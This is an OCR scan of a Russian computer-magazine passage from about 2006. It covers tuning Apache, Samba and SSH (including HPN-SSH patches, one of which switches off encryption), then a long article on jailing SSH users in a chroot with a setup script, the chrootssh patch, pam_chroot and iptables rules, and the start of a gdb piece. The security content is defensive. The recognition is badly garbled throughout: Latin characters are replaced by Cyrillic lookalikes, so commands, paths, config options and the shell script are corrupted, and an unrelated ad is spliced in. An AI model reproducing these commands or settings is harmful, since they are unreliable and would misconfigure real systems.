следует увеличить данное значение. Но, если 
у тебя самый обычный ѴѴеЬ-сервер, на кото- 
ром не лежат ІЗО-образы последних дистров, 
фильмы и прочие тяжеловесные файлы, мож- 
но уменьшить значение таймаута до 30 секунд 
(по умолчанию оно равно 300 секундам). 
Немного повысить производительность мо- 
гут КеерАІіѵе-соединения, так называемые 
постоянные соединения. Схема обычного со- 
единения: подключились, отправили запрос, 
получили ответ, отключились. А вот в случае 
с постоянными соединениями за одно соеди- 
нение можно отправить несколько запросов 
и получить ответы. Поскольку процедура под- 
ключения/отключения для каждого запроса 
отсутствует, это позволяет повысить произ- 
водительность. Включить постоянные соеди- 
нения можно за счет директивы КеерАІіѵе, а 
с помощью КеерАІіѵеТітеоиі установить тай- 
маут для постоянного соединения (рекомен- 
дуемое значение — 1 0-20 секунд). 

Чтобы твой индеец заработал еще быстрее, 
отключи директиву НозіпатеІ_оокирз. Сервер 
Арасбе ведет журнал доступа других компью- 
теров. Если включить данную опцию (оп), то 
в журнал будет записано доменное имя ком- 
пьютера-клиента. Если эта опция выключена 
(оЯ), то в журнал попадет ІР-адрес клиента. 
Включение данной опции замедляет работу 
сервера, так как требуется дополнительное 
время на ожидание ответа от сервера ЭИЗ. 



О Танцуем самбу еще быстрее 

В главном конфигурационном файле ЗатЬа 
(зтЬ.сопі) присутствует параметр «ѵѵісіе 
Ііпкз». Если установить его в «по», то произво- 
дительность службы снизится приблизитель- 
но на30%, таккакСамбане будетследовать по 
символическим ссылкам вне экспортируемой 
области. Чтобы определить, где находится 
ссылка — в области или вне области, — Самба 
сначала следует по символической ссылке, а 
затем выполняет так называемый «сіігесіогу 
раІН Іоокир» для определения, где заверши- 
лась ссылка. Данная операция занимает 6 до- 
полнительных системных вызовов на каждый 
файловый Іоокир, а таких запросов Самба 
делает очень много. 

Производительность Самбы во многом за- 
висит от того, правильно ли настроены па- 
раметры стека протоколов ТСР/ІР. Если 
размер запросов и ответов не фиксирован, 
то рекомендуется применять ТСР с опцией 
ТСР_ІЧСЮЕІ_АѴ: 

Тесты показывают, что ЗатЬа при больших 
нагрузках работает в 3 раза быстрее, чем без 
указания этой опции. Если ЗатЬа использу- 
ется в локальной сети (а в большинстве слу- 
чаев так оно и есть), то рекомендуется также 
указать опцию ІРТОЗ_І_0\Л/ЭЕІ_АѴ: 

зоскеіорііопз = ІРТОЗ_І_0\АЮЕІ_АѴ ТСР_І\ІСЮЕІ_АѴ 

Хочешь выжать из ЗатЬа еще больше? Тог- 
да установи следующие параметры буфе- 
ризации: 30_РСѴВЫР, равный 8192, и 30_ 
ЗІЧЭВІІР, равный 8192, как показано ниже: 

30_31\ЮВ11Р=8192 

О Десятикратное ускорение $$Н 

На страничке ѵѵѵѵѵѵ.рзс.еби/пеіѵѵогкіпа/ 
ргоіесіз/Ьрп-ззЬ/ можно скачать патчи (про- 
ект НРІЧ-ЗЗН), ускоряющие копирование по 
ЗСР в 10 раз! Конечно, патчи применяются 
к исходникам ОрепЗЗН ( ѵѵѵѵѵѵ.орепззіі.сот/ 



рогІаЫе.ЫтП . Но перед тем, как устанавли- 
вать НРІЧ-ЗЗН, нужно произвести неболь- 
шой тюнинг стека ТСР/ІР. Об этом подробно 
рассказывается на страничке ѵѵѵѵѵѵ.рзс.есіи/ 
пеІѵѵогкіпа/ргоіесІзЛсрШпе/ . 

Прибавка производительности достигает- 
ся за счет изменения размера буферов ЗЗН 
или за счет отключения шифрования при 
передаче файлов. Также есть патч, позво- 
ляющий полностью отключить шифрование 
при передаче файла (все мы понимаем, что 
с точки зрения безопасности это нецеле- 
сообразно). 

Заставить работать ЗСР быстрее очень 
просто: скачиваем и распаковываем исход- 
ники, забираем патч, применяем его (см. тап 
раісЬ). После этого нужно перекомпилиро- 
вать ОрепЗЗН. Разумеется, если ОрепЗЗН 
установлен из РРМ, то перед выполнением 
всех этих действий нужно удалить соответс- 
твующий РРМ-пакет. Причем применить 
патчи и перекомпилировать ОрепЗЗН нуж- 
но как на сервере, так и на клиенте, иначе 
все без толку. 

На страничке проекта НРІЧ-ЗЗН можно найти 
несколько патчей. Для большинства пользо- 
вателей подойдет патч НРІЧ-11, который яв- 
ляется своеобразным компромиссом между 
производительностью и безопасностью. При 
скачивании патча обрати внимание на его 
версию — она зависит от версии твоего па- 
кета ОрепЗЗН. Для того чтобы задействовать 
НРІЧ-11 после перекомпиляции ОрепЗЗН, 
укажи в командной строке параметр '-Р' для 

5Ср ИЛИ '-Г' ДЛЯ 55І1. 

Патч «НРІЧ-11 \лЖЬ ІЧопе СірЬег» вообще от- 
ключает шифрование при передаче файлов. 
Шифруются только имя пользователя и па- 
роль, которые передаются по сети. После 
успешной аутентификации шифрование не 
используется, и файлы передаются по сети в 
открытом виде. Это довольно опасно, но если 
передается объемная и не конфиденциаль- 
ная информация (например, музыка или ви- 
део), то этот патч все-таки оправдываетсебя. 
После применения патча отключить шифро- 
вание можно с помощью опции '- 2 ' командной 
строки (как для ззф так и для зср). =Н= 
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"ФУТБОЛЬНЫЙ МЕНЕДЖЕР"! 

СОЗДАЙ СВОЮ КОМАНДУ ИЗ РЕАЛЬНЫХ ИГРОКОВ И ПРИВЕДИ ЕЕ К ПОБЕДЕ 



ТЫ ПОЛУЧАЕШЬ $135 МИЛЛИОНОВ 

но приобретение игроков российской премьер-лиги при 
регистраци и ко са йте ѵ^ѵлѵ.ІоІаИооІЬаІІ.ги. 

Подробности на сайте «ппѵ.ІоІаІ-іооІЬяІІ.пі 



ГЛАВНЫЙ ПРИЗ - 
ПОЕЗДКА НА ФИНАЛ ЛИГИ 
ЧЕМПИОНОВ 2006/07 




ІВГЕНИЙ ЗОБНИН АКА Л М 






" ипіхоігі 



Под защитой 
песочного демона 



ОСОБЕННОСТИ ФУНКЦИОНИРОВАНИЯ $$н 
В СНВООТ-ОКРУЖЕНИИ 



: -КОГДА ВОЗНИКАЕТ ВОПРОС ОБ ОРГАНИЗАЦИИ ДОСТУПА К УДАЛЕННОЙ МАШИНЕ, ЛУЧШЕГО РЕШЕНИЯ, ЧЕМ ЗЗН, НЕ НАИТИ. 
КАК ВОЛШЕБНАЯ ПАЛОЧКА, ЗЗН ДЕЛАЕТ ДРУЗЕЙ ГОСТЯМИ, А НЕДРУГОВ ВЫСТАВЛЯЕТ ЗА ДВЕРЬ. НО В НЕУМЕЛЫХ РУКАХІ 
ВОЛШЕБСТВО МОЖЕТ ПРЕВРАТИТЬСЯ В ЧЕРНУЮ МАГИЮ И ОБЕРНУТЬСЯ ПРОТИВ СВОЕГО ХОЗЯИНА. ДОБРЫЙ ВОЛШЕБНИК I 
МЭРЛ ИН РАССКАЖЕТ, КАК ЭТОГО ПРЕВРАЩЕНИЯ НЕ ДОПУСТИТЬ И УБЕРЕЧЬ СЕБЯ ОТ ТОГО, ЧТО СКРЫВАЕТСЯ ВНУТРИ ЯЩИ-| 
КА ПАНДОРЫ. 



родолжая тему изолированных ок- 
ружений времени исполнения, или 
попросту «песочниц», предлагаю 
твоему вниманию очередную статью в этом, 
уже можно сказать, цикле. В прошлый раз 
мы рассмотрели преимущества технологии 
ІаіІ, средства для создания виртуальных сер- 
веров в ОС РгееВЗО. В том материале акцент 
был сделан на самой технологии виртуализа- 
ции, а пример с ззб приведен только для де- 
монстрации практической пользы ]аіІ-окруже- 
ний. Сегодня мы немного изменим круг наших 
интересов (если, конечно, никто не против) и 



поместим в его центр сам ззИ-сервер, а'сИг6оЁ 
окружение будем использовать только как 
средство достижения заветных целей. Кроме 
того, в качестве рабочей платформы сегодня 
будет выступать І_іпих, лидер по количеству 
продаж и установок . 

Перед нами стоит задача организации уда- 
ленного доступа к нашей машине. Мы должны 
раздавать аккаунты недоверенным пользова- 
телям в большом количестве и без проверки 
личной информации. Само собой, предостав- 
ление доступа такому контингенту потребует 
особых мер защиты, потому как трудно опре- 



делить истинные намерения человека только 
по его имени и ІР-адресу. Правильной на- 
стройки ззИ-сервера и брандмауэра в данном 
случае не достаточно, необходимо ограниче- 
ние пользователя уже внутри самой системы. 
Поэтому лучшим решением будет помещение 
юзеров в изолированную среду, сбгооі-окру- 
жение, с обрезанием всего, что может быть 
использовано в корыстных целях. 



Свобода свободе рознь 

Итак, вооружившись знаниями и взяв в руки 
флаг «Не допустим браконьерства!», отправ- 
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ПОД ЗАЩИТОЙ ПЕСОЧНОГО ДЕМОНА 



* с«( /огцс/ с«( /ѵвг/гцп/міітб.іііб /ад 

00040000-0000(000 

0806(000-08093000 
08092000-08067000 
Ь7бгс000-67634000 
67634000-6763*000 
67636000-6763*000 
6703*000 67040000 
67040000-67047000 
67047000-67049000 
67049000-67046000 
67046000-67040000 
67040000-6704*000 
6704*000-67е64000 
67*64000-67*65000 
67*65000-67*66000 
Ь7е66000-67е69000 
67*69000-67*66000 
67*66000-67*70000 
67в70000-67е 72000 
67*72000-67*99000 
67е99000-67еоЬ000 
67**6000-67**6000 
6 7**6000-6?**( ООО 
67*8(000-67*6(000 
67с6( ООО -67*с 0000 
67ес0000-67ес2000 
67#С2000-67*С4000 
67СС40О0 -67(3*000 
67(аеооо-б7(соооо 
67(с0000-67(с4000 
67(с40О0 67(62000 
67(62000-67(63000 
67(63000-67(65000 
67(65000-67(67000 
67(6еООО-67( (3000 
б7( ( 3000- 67 ( (5000 
6(*66000-6(*(3000 

((((*ооо-(((((ооо 



IV 



03:07 
гшкр 00046000 03:07 
гш*р 08092000 00:00 
г-хр ОООООООО 03:07 
гшкр 00007000 03:07 
г-хр ОООООООО 03:07 
г икр 00007000 03:07 
г-хр ОООООООО 03:07 
гшкр 00006000 03:07 
Г-хо ОООООООО 03:07 
гшкр ООООІООО 03:07 
гшкр 67646000 00:00 
Г-хр ОООООООО 03:07 

р 00116000 03:07 

г-хр 00116000 03:07 
гшкр 00117000 03:07 
гшкр 67*69000 00:00 
г-хр ОООООООО 03:07 
гшкр 00004000 03:07 
гшкр 67*72000 00:00 
г-хр ОООООООО 03:07 
гшкр ООО 11000 03:07 
гшхр 67**6000 00:00 
г-хр ОООООООО 03:07 
гшкр 0000(000 03:07 
Г-хр ОООООООО 03:07 
гшкр ООООІООО 03:07 
Г-хр ОООООООО 03:07 
гшхр оооеаооо 03:07 
гшхр 67(с0000 00:00 
Г-хр ОООООООО 03:07 

р 0000*000 03:07 

гшхр 0000*000 03:07 
гшхр 67(65000 00:00 
г-хр ОООООООО 03:07 
гшкр 00014000 03:07 
гшкр 6(*66000 00:00 
— О ОООООООО 00:00 



49079 /изг/з6іп/55б6 

49879 /ивг/*6 1п/**66 

О (6* ар] 

10937 /116/116055.(11*8-2.3.4.50 

10937 / 1 16/ 1 16П55_( і 1*5—2 . 3.4 . 50 

10953 /116/1І6ПЗЗ.ПІЗ-2. 3 . 4.50 

10953 /ІІ6/1і6П5*_ЛІ5-г.3.4.50 

11450 / 116/ 11ЬП5«_С0(Пр*1 -2.3.4.80 

11450 /116/116Л55_С0ШР*1-г.3.4.5О 

11452 /116/11661-2.3.4.50 

11452 /116/11661-2.3.4.50 

О 

11441 /116/116С-2.3.4.30 

11441 /116/ 1 16С-2.3.4 .50 

11441 /116/1160-2.3.4.50 

11441 /116/1І6С-2.Э.4.30 



249819 /изг/ 116/ 1162. 50. 1.2.2 

249819 /ивг/ 116/ 1162. 50. 1.2.2 

11421 /116/1 16и( 11-2. 3.4. 30 

11421 /116/1160(11-2.3.4.50 

49621 /ІІ5Г/ 116/1 ІбСГѴРІ 0.50.0.9.7 

49621 /иЗГ/116/116СГ9Р(0.50.0.9.7 

О 

11459 /116/1 ІбгСЗОІѴ-2 .3.4. 50 

11459 /116/1 16**80 ІѴ— 2 .3.4.50 

11459 /1 16/ 1 І6Г850 IV— 2 .3.4. 50 

О 

11422 /116/16-2.3.4.50 

11422 /116/16-2.3.4.50 

О (8(*см 

О 1ѵб50] 



3 166 5366' 

ііпих-еаіе.зо. 1 => (ОхННеооо) 

ІіЬгезоІѵ.50.2 => /1ІЬ/1ІЬгеза1ѵ.50.2 (0x67(14000) 
Шсгярю.50.0 => /иЗГ/ПЬ/ІІЬСГурІО.ЗО.О (0*67814000) 
ІІЬиШ.зо.І => /1і6/ІІЬи( 11.50. 1 (ОхЫеЮООО) 
ІіЬг.зо.І => /изг/ 1ІЬ/1 162.50.1 (0х676((000) 
Шп$і.$о,і => /Ш/ііЬп$і.$а.і (ОхЬ7бе9000) 

ІІЬегурІ .50. 1 => /1ІЬ/11Ьсгур( .50.1 (ОхЬТбЬЬООО) 

116с. 50. 6 => /иь/іібс.50.6 (ОхЬТсЗеООО) 
ішбі. 50 . г => /ііб/иьбі.зо.г со*Ь7с9эооо) 
/ИЬ/іб-ііоих.50.2 (охб7(геооо) 

$ I 



> Некоторые библиотеки Ібб не показал 



ляѳмся на защиту наших рубежей. Во-пер- 
вых, следует определить, какие команды 
могут понадобиться пользователям после 
того, как они окажутся внутри сНгооі. В за- 
висимости от того, для каких целей органи- 
зовывается доступ, это может быть предо- 
ставление доступа клиентам хостинга к их 
страничкам, хранение важной информации 
или банальный прокси — вариантов много. 
Поэтому стоит сразу обдумать, какие компо- 
ненты ОС будут доступны клиентам. 
Создание сбгооі-окружения начинается 
с организации минимальной каталоговой 
структуры внутри выделенного каталога и 
копирования туда программ, о которых мы 
уже подумали, а также необходимых для их 
нормальной работы библиотек (проверяет- 
ся с помощью /изг/Ьіп/ІсІсІ). Кроме того, пона- 
добятся некоторые элементы каталога /беѵ. 
Копировать все это руками совсем неинте- 
ресно, поэтому мы воспользуемся неболь- 
шим скриптом, который сделает грязную 
работу за нас: 

# ѵі ~/Ьіп/тксІігоо1 

#!/Ьіп/зІі 

СНН00Т=$1 

# какие команды мы хотим предоставить пользовате- 
лям 

СІѴЮ8="/Ьіп/зГі /Ьіп/ЬазГі /Ьіп/Із /Ьіп/ср /Ьіп/тѵ /Ьіп/гт 
/Ьіп/тксііг /изг/Ьіп/ісІ" 

# создаем каталог для сГігооі-окружения 
тксІіг-р$СННООТ 

сГіоѵѵп гооі:гооі$СННООТ 
сГітосІ 700 $СННООТ 
ссі $СННООТ 

# создаем каталоговую структуру 

0ІН5="Ьіп зЬіп ІіЬ еіс сіеѵ Гюте изг изг/Ьіп /изг/зЬіп изг/ІІЬ" 
!огсіігіп$ОІН 5; сіо 



> Кажется, что требования ззіісі к библиотекам крайне скудны 



II 




тксІіг-р$сІіг 
сіопе 

# копируем необходимые библиотеки 
і_ІВЗ='ісісі $СІѴЮЗІдгер -ѵ ':$1дгер -ѵ "по! а бупатіс 
ехесиіаЫе'ІсиІ: -1 3 -сі " "Ізогііипідізеб 1 б' 

Тог ІіЬ іп $ЫВЗ; бо 
ср-Р$ІІЬ ,/$ІіЬ 
ср-І_$ІІЬ ,/$ІіЬ 
бопе 

ср -Р /ІІЬ/Іб-Ііпих.зо.2 ./ІІЬ 
ср -Ь/ІІЬ/Іб-Ііпих.зо.2 ./ІІЬ 

# копируем команды 
Ьгстб іп$СІѴЮЗ; бо 

ср-Р$стб./$ стб 
ср-І_$стб ./$стб 
бопе 

# создаем необходимые файлы устройств 
ткпоб -т 666 беѵ/пиІІ с 1 3 
ткпоб -т 666 беѵ/гего с 1 5 

Ставим на скрипт бит исполнения и запускаем: 

# сГітосІ +х -/Ьіп/тксНгоо 

# ~/Ьіп/тксІігоо1 /изг/сТігооТ/ззИ 

Каталог /изг/сбгооѴззІз волшебным образом 
наполнится почти всем, что может только по- 
надобиться. Следующий шаг — перенос ззИ. 
Потребуется скопировать сам демон /изг/зЬіп/ 
ззбсі , файл /изг/ІіЬехес/зіір-зегѵег (если требу- 
ется зіір-сервер), конфигурационные файлы 
/еіс/ззб/{тосІиІі,5зЬ_сопЛд,ззЬсІ_сопЛд}. 
Далее следует создать два каталога внутри 
сбгооі-окружения: /ѵаг/етріу (без него ззбсі не 
сможет понижать свои привилегии до пользо- 
вателя ззбсі), /ѵаг/гип (для хранения РЮ-фай- 
ла) и несколько дополнительных файлов ус- 
тройств: /сіеѵ/игапсіот, /беѵ/рітх, /беѵ/ріур*, 
/сіеѵ/ріуц*, /беѵ/Дур*, /сІеѵ/Дуд* (нужны для 
работы псевдотерминала). Проще будет 
скопировать их из корневой машины. Кроме 
того, рекомендуется перенести каталог /изг/ 



зНагеДегтіпГэ для правильной инициализа- 
ции терминала (иначе многие клавиши будут 
работать неверно). Осталос! скопировать 
библиотеки и перенос ззбсі можно считать 
завершенным. Прием с ІсІсІ в данном случае 
не пройдет, так как ззЬ-демон загружает не- 
которые библиотеки на лету. Чтобы узнать о 
всех (с оговорками) требуемых библиотеках, 
потребуется запустить ззЬсІ на корневой ма- 
шине и выполнить следующую команду: 

$ саі /ргосД саі/ѵаг/гип/ззіісі.рісі'/тарз 

Сервер ззЬ установлен и готов к запуску. Сле- 
дующий шаг — создание ключей и клиентских 
аккаунтов. Первая процедура достаточно 
тривиальна и выполняется несколькими про- 
стыми командами: 

# ссі /изг/сіігооі/ззіі 

# ззИ-кеудеп -1 сіза -I еІс/ззН/ззН Нозі сіза кеу N 11 

# ззИ-кеудеп -1 гза -I еІс/ззИ/ззИ Иозі гза кеу N " 

С аккаунтами немного сложнее. Дело в том, 
что стандартные утилиты, манипулирующие 
привилегиями пользователя, не позволяют 
изменить месторасположение файлов /е\с/ 
{разз\д/сІ,зІіасІо\А/,дгоир}. Эта проблема может 
быть решена различными способами. Можно 
скопировать эти файлы в укромное место, 
создать на их месте пустые файлы, добавить 
нужные аккаунты для пользователей, пере- 
местить файлы в сЬгооЬ восстановить ориги- 
налы. Можно установить в сЬгооі утилиты /изг/ 
зЬіп/{раззѵѵб,изегабб,изегсІеІ,изегтосІ} (для 
этого достаточно добавить их в переменную 
СМЭЗ вышеприведенного скрипта), зайти в 
сНгооі под рутом и добавить пользователей. 
В конце концов, никто не запрещает править 
файлы вручную, как это делаю я. Главное 
— создать пользователей гооі и ззбсі, а также 
группы гооГ ззбсі и ззбизегз, (в последнюю мы 
будем помещать наших пользователей). 
Последний штрих — изменяем значение оп- 
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ІЛМІХІСЮ 




' - - *, 

и ей /изг/сІігооі/ззИ 

и ззЬ-кеудеп ~Х йза -1 е1с/з5К/ззН_И05І_сІза_кеу -М ' 1 
бепегаііпз риЫіс/ргіѵаіе сіза кеу раіг. 

Ѵоиг ійепШісаіІоп Іізз Ьееп заѵей іп еіс/зз1і/зз1і_1і05і:_йза_кеу. 
Ѵоиг риЫІс кеу Гіаз Ьееп заѵей іп еіе/ззІі/ззІі_Ііозі_гіза_кеу.риЬ. 
ТЬе кеу Нпйегргіпі із; 

*е : 8а : 4Ь : 29 : 8? : 07 : Ь4 : 62 : 05 : 2с : ЙЗ : еЬ : 48 : Оі : +3 : с5 гооІ@пеш 
и ззіі-кеуёеп -і гза ~і еіс/ззІі/ззІі„Ііозі = гза_кеу -м ' ' 
бепегаііпг риЫіс/ргіѵаіе гза кеу раіг. 

Ѵоиг ісіепШісаііоп Иаз Ьееп заѵес) Іп е1е/ззІі/55Іі_!іозг_г5а_кеу < 
Ѵоиг риЫіс кеу Ьаз Ьееп заѵей іп еі:с/ззЬ/5зЬ_Ьозі:_г5а_кеу.риЬ. 
ТЬе кеу Ппзегргіпі із: 

5с1 : СС : 63 : 4а : 2е : ’РІ :с!і : 1і : 38 ;08: 45 : Ы 1 : еЗ : іе : 37 : 18 гооібпеш 




# сИгоо! /изг/сНгооі/ззН /изіѴзЬіп/ззІісІ 



О Нестандартные решения 
стандартных проблем 

К сожалению, описанный выше способ 
имеет один серьезный недостаток, прояв- 
ляющийся в том, что теперь невозможно 
получить ззН-доступ к корню. В случае с іаіі- 
окружением эта проблема решается чуть ли 
не автоматически благодаря виртуализации 
сетевых ресурсов. В данной же ситуации мы 
не можем запустить второй ззН-сервер на 
корневой машине, две программы техничес- 
ки не способны разделять один порт. Само 
собой напрашивается решение — изменить 
значение опции «Рог!» одного из ззб-серве- 
ров на номер другого, незанятого порта. На 
мой взгляд, не совсем удачный ход: путани- 
цы и так хватает, а способ защиты на основе 
смены порта довольно наивен. А что если 
сделать так, чтобы корневой ззб-сервер 
делал системный вызов сіігоо! и отправлял 
указанных пользователей в изолированную 
среду? Несмотря на всю абсурдность и про- 
тиворечивость такой идеи, она является на- 
иболее популярной. 

План следующий: патчим ззбеі таким обра- 
зом, чтобы он, встретив в базе пользовате- 
лей некий знак, делал сбгооі(2) и отрезал 
юзера от корня. Идея настолько проста и 
примитивна, что любой человек, обладаю- 
щий навыками программирования, способен 
исправить ззбеі и придать ему нужную фун- 
кциональность. Но ничего кодить не придет- 
ся, — об этом уже позаботился человек из 
проекта сбгооіззИ ( сіпгооіззіі.зі.пеі ). Все, что 



от нас требуется, — это наложить на сырцы 
"ОрепЗЗН патч оззНСНгоо!-4.3р1 .сШ или ска- 
чать тарболл орепззб-4.3р1-сИгооі.іаг.д2 с 
предварительно пропатченными исходника- 
ми, а затем произвести сборку и установку 
модифицированной версии. 

Далее вышеприведенным скриптом потребу- 
ется создать сНгоо!-окружение для будущих 
юзеров. Самих сНгооі'ных клиентов мы со- 
здадим тоже в корне и поместим их в группу 
ззбизегз. Причем в поле домашнего каталога 
этих юзеров необходимо указать каталог «/ 
изг/сбгооі/ззІі/./Ііоте/изег» («. » — это и есть 
та самая метка, на которую ззбеі реагирует, 
как собака на кость, и отправляет пользова- 
теля в глубокий сбгоо!, а именно — в каталог, 
указанный перед точкой). Осталось только 
перенести некоторые строки из базы пользо- 
вателей корня в сНгоо!-окружение: 

# ссі /изг/сІігооі/ззГі 

# дгер /еіе/дгоир -е мл гооі" -е ,,л ззІиі5ег5 ,, \ 

> еіс/дгоир 

# дгер /еіс/раззѵѵсі -е ІІЛ гоо1" >> еіс/раззѵѵсі 

# дгер /еіс/раззѵѵсі -е " л изег" >> еіс/раззѵѵсі 

Последнюю команду придется выполнять 
каждый раз после добавления новых клиен- 
тов в группу ззНизегз. 

Другой, еще более грязный способ, предло- 
жил \Л/оІ!дапд РизсИІЬегдег. Скрипт, который 
можно скачать с его сайта ( ѵѵѵѵѵѵ.іизсІпІЬегаег. 
пе!), подготавливает сбгооі-окружение таким 
образом, что выбранные пользователи авто- 
матически попадают в сИгоо!, причем реали- 
зуется это стандартными средствами. Как же 
он работает? 

1 . Создается стандартное іаіі-окружение и в 
него, кроме всего прочего, копируется /Ьіп/зи. 
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2 . В каталог /Ьіп корневой машины ложится 
файл ззИ-зИеІІ, примерно такого содержания: 

# ѵі /Ьіп/ззГі-зІіеІІ 

!#/Ьіп/зИ 

/изг/Ьіп/зисІо /изг/Ьіп/сГігоо! /изг/сЬгооІ/ззЬ /Ьіп/зи - 
$113ЕН 

3. В файл /е!с/зибоегз корневой машины до- 
бавляется запись следующего вида: 

# ѵізисіо 

изег Аи_=[\ЮРА83\ЛЮ: /изг/Ьіп/сЬгооі, /Ьіп/зи - изег 

4 . Также в корневую машину добавляется 
юзер с домашним каталогом /изг/сЬгоо!/ззЬ/ 
Ноте/изег и группой ззНизег, причем в качест- 
ве шелла ему назначается /Ьіп/ззИ-зИеІІ. 

5 . В файл /е!с/раззѵѵсІ сНгоо!-окружения до- 
бавляются пользователи гоо! и изег, а в файл 
/е!с/дгоир — группа гоо! и ззНизегз. 

В результате вырисовывается очень инте- 
ресная картина. После регистрации пользо- 
ватель, у которого в качестве шелла указан 
/Ьіп/ззИ-зИеІІ, сам того не подозревая, выпол- 
няет прописанные в этом файле команды и 
попадает в сНгоо!-окружение, а все осталь- 
ные могут ходить по корню. Такой вот пример 
костыльно-велосипедного подхода, демонс- 
трация «путилинуксоида» во всей красе! Луч- 
ше уж патчить ОрепЗЗН. Хотя нет, погодите, 
ведь главная задача ззЬ, помимо шифрова- 
ния трафика, — авторизация пользователей. 
А эта процедура в последние годы неразрыв- 
но связана с технологией РАМ. Может быть, 
мы сможем использовать ее возможности в 
наших целях? 

РАМ-модуль с нужной нам функциональнос- 
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ПОД ЗАЩИТОЙ ПЕСОЧНОГО ДЕМОНА 



.V ѴС- 



тью действительно существует и входит в поставку мно- 
гих дистрибутивов. Называется он рат_сНгооі, а принцип 
его работы очень прост: он делает сНгооі для всех поль- 
зователей, прописанных в конфиге. Кроме того, способ, 
основанный на использовании этого модуля, является 
наименее трудозатратным из всех ранее изложенных. 
Смотри сам: 



$ зисіо 1$ -К /изг/с&гооІ/ззН 
/изг/сНгооі/ззН: 

Ып сіеѵ еіс Ьоше ІІЬ зЫп изг 

/изг/сНгооІ/ззЬ/Ь іп : 

Ьа$Ь ср 1$ іяксііг тѵ гт зЬ 

/изг/сіігооі/ззіі/сіеѵ: 
пиіі 2 его 

/изг/сіігооі/ззіі/е'іс : 

/изг/сйгооі /ззЬ/Иоте : 



1 . Создаем «песочницу», используя скрипт ~/Ьіп/ 
тксНгооі 

2 . Создаем группу ззііизегз и заводим пользователей. 

3. Выполняем две команды (вторая должна быть продуб- 
лирована для каждого юзера): 



/изг/сНгооі /ззіі/ 1 ІЬ : 

ІсІ-2.3.4.30 ІІЬс.зо.б ІІЬріЬгеасІ-0.10 
ігі-ііпих.зо.2 1 ІЬсІ 1— 2 .3.4. зо ііЬріЬгеай.зо.О 
ІІЬс-2.3.4.30 ПЫЛ. 50. 2 ІІЬгІ-2.3.4.30 

/изг/сНгоо і/ззН/зЫп : 



# есИо "$е$$іоп геяиігесі рат_сНгоо1.5о" » /еіс/рат.сі/ззіі 

# есИо "изег/изг/сіігооі/ззіі 11 >>/е1с/зесигі1у/сІігоо1.сопі 



/изг/сіігооі/ззіі/изг : 
Ып ІІЬ 



4 . Перезапускаем ззбсі. 



/изг/сЬгоог/ззЬ/изг/Ып : 

іа 



Но есть один маленький нюанс. Системный вызов сбгооі: 
может исполнять только гооі, поэтому ззбсі до самого ло- 
гина пользователя должен работать с соответствующими 
правами. По умолчанию ззбб время от времени понижает 
свои привилегии до пользователя ззілсі, но это можно ис- 
править, добавив в конфиг строку «ІІзеРгіѵіІедеЗерагаііоп 
по». 

О Огнеупорный 88Іі 

Поместить ззб в сіігооі-окружение и обеспечить его бес- 
перебойную работу — еще полдела. Необходимо также 
правильно настроить брандмауэр и защитить все осталь- 
ные сервисы от проникновения извне. Ниже приведен 
фрагмент конфига іріаЫез (еіМ — это внешний сетевой 
интерфейс). 

Настраиваем брандмауэр 

ІТ=‘/изг/зЬіп/і рІаЫез' 



/изг/сЬгооі/ззЬ/изг/ІІЬ : 

І*_І 

> Результат, исполнения скрипта ~/Ьіп/тксЫооІ 

Ж Ж 

свои дИтоиВгва, но не один из них не лишен недостат- 
ков. Пример с[помещением демона ззбсі прямо в сНгооІ- 
окружение блёстяще работает до тех пор, пока не пот- 
ребуется получить доступ к корневой машине. СНгооіззб 
отлично справляется со своей задачей и прост в настрой- 
ке, но требует пересборки пакета ОрепЗЗН. Скрипт от 
ѴѴоІІдапд РизсрІЬегдег прост в эксплуатации, но создан 
с использовщіием садомазохистских приемов. Модуль 
рат_сбгооі обладает особым изяществом, требуя, чтобы 
ззб-сервер всегда работал с правами администратора. 
По какому путй пойти — решай сам. Я свою задачу выпол- 
нил, расписав все известные мне подходы. 



# очищаем правила 
ЗІТ-Р 

$ІТ-РІІ\ІРІГтВОР 
$ІТ-Р РОРѴѴАРО ОПОР 

$іт-РОіярігтпор 

# пропускаем все пакеты наружу 
$ІТ -А ОІЯРІЯ-і АССЕРТ 

# принимаем все пакеты с интерфейса обратной петли 
$ІТ -А ІІЧРІІТ -і Іо -б 1 27.0.0. 1 -р АІ_І_ -\ АССЕРТ 

# принимаем трафик установленных соединений 

$ІТ -А ІІЧРІЯ -і е№і 1 -т зіаіе -зіаіе ЕЗТАВиЗНЕОЩЕЬАТЕО -і АССЕРТ 

# открываем доступ к ззГі-серверу 

$ІТ -А ІІЧРІЛ -і еіГі 1 -р іср -сіезііпаііоп-рогі 22 -\ АССЕРТ 

О Подводя ИТОГ 

Каждый из приведенных в статье способов защиты имеет 



О иѵніх тіі8і сііе? 

Какой еще сбгооР? Почему в Ыпих нет настоящей вир- 
туализации? Думаю, эти вопросы интересуют многих. 
Действительно, у поклонников РгееВЗО есть іаіі, люби- 
телям операционной системы, названой в честь фантас- 
тико-философского произведения Станислава Лема, 
досталась еще более продвинутая технология гопез, 
а линуксоидам приходится довольствоваться прими- 
тивной песочницей. К счастью, этот недостаток можно 
компенсировать за счет сторонних разработок. Напри- 
мер, аналог іаіі присутствует в РЗВАС ( уууууу.гзЬас.ога ). 
сходную функциональность можно получить, наложив на 
ядро специальный патч ( кегпеІІгар.огд/посІе/ѵіеѵѵ/3823 ). 
реализованный с использованием технологии І_ЗМ (Ыпих 
Зесигііу Мобиіез). Также не стоит забывать о том, что ядро 
Ыпих уже давно научилось работать поверх виртуальной 
машины ХЕЫ (о ней читай в моей статье «Искусство вир- 
туализации»), а это открывает поистине безграничные 
возможности для виртуализации. НС 



ХАКЕР 09 /93/ 06 



.зо ІІЬгТ .30. 1 

ііЫегтсар.зо.2 
ІіЫегтсар.зо.2. 0.8 




> Хорошей идеей будет 
вообще отказаться от 
копирования библиотек 
и слинковать программы 
статически. 

> Чтобы помещенный в 
сбгооРокружение ззіісі 
мог беспрепятствен- 
но вести логи, демон 
зузіод должен быть 
запущен с опцией: 
-а/изг/сГігооІ/ззІі/беѵ/Іоа. 
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П од Ыпих/ВЗО существует мно- 
жество отладчиков, но общепри- 
знанный лидер — это, бесспорно, 
дсІЬ, входящий в состав практически любо- 
го дистрибутива. Внешне (только внешне!) 
схожий с беЬид.сот, он так и дышит мощью, 
поражающей воображение и потрясающей 
сознание по мере его освоения. 

Да-да, именно освоения! В отличие от зоЙ- 
ісе дсІЬ основан на невизуальных концеп- 
циях и ориентирован на удобство работы, 
а совсем не на легкость освоения. В нем 
заложено столько возможностей, что их 
невозможно загнать в «прокрустово ложе» 
визуального интерфейса. По количеству 
